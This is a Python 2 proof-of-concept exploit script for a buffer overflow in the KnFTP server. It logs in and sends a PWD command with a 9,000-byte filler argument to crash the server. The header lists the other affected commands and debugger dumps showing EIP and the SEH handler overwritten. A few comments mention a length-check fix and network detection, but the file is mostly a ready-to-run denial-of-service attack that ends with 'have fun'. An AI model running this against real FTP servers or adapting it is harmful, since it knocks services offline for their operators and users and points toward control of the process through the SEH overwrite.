`#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable, even commands
# that the server doesn't support. SEH and/or EIP gets overwritten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.
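# Debugger register dumps for three of the commands follow; in each one EBX
# points at the command name (MKD, LS, ABOR).
#EAX 7EFEFEFE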
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
import socket
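# Denial-of-service reproduction against a lab copy of KnFTP: log in, then send
# one command whose argument is far longer than any legitimate FTP path.
# The header dumps show the resulting fault inside msvcrt with EDX = 41414141
# and an SEH chain entry whose handler is 41414141, i.e. the filler bytes below
# reached memory well past the server's command buffer.
# Defender view: the server-side fix is to bound the command line length before
# copying it, and an FTP control-channel line of this size is a simple
# detection signal on the network.
# Python 2 script: send() is given str objects.
buffer = "\x41" * 9000  # 9000 x 'A' (0x41), the 41414141 pattern in the dumps

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # 'xxx.xxx.xxx.xxx' is the author's placeholder for the test server address.
    connect = s.connect(('xxx.xxx.xxx.xxx', 21))  # connect() returns None
    s.recv(1024)  # reply to the connection (server greeting)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS test\r\n')
    s.recv(1024)
    # PWD carries the oversized argument here; the header lists the other
    # commands the author reports as affected in the same way.
    s.send('PWD ' + buffer + '\r\n')
    s.recv(1024)
    s.send('QUIT\r\n')
finally:
    # The original wrote `s.close` without parentheses, which only names the
    # method and never runs it; call it so the socket is released on every path.
    s.close()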
`